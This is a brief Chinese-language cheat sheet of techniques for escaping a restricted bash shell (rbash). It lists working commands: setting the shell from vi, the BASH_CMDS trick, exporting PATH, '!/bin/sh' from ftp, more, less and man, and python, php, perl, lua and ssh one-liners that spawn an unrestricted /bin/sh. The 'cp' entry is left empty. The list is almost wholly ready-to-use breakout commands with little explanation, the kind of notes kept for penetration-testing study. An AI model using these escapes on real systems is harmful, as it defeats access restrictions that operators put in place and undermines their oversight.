Rbash
VI绕过
vi:set shell=/bin/sh 运行shell:shell export PATH=/usr/sbin:/usr/bin:/sbin:/bin
CP绕过
cp
环境变量绕过
BASH_CMDS[a]=/bin/sh;a 注:把/bin/bash给a变量` export PATH=$PATH:/bin/ 注:将/bin 作为PATH环境变量导出 export PATH=$PATH:/usr/bin 注:将/usr/bin作为PATH环境变量导出
常见绕过
利用系统常见应用逃逸
ftp
more
less
man
vi
vimed以上在输入的地方输入!/bin/sh 或 !/bin/bash
python
python -c 'import os; os.system("/bin/sh")'
php
php -a then exec("sh -i");
perl
perl -e 'exec "/bin/sh";'
lua
os.execute('/bin/sh')
ssh
ssh username@IP - t “/bin/sh” or “/bin/bash”
ssh username@IP -t “bash --noprofile”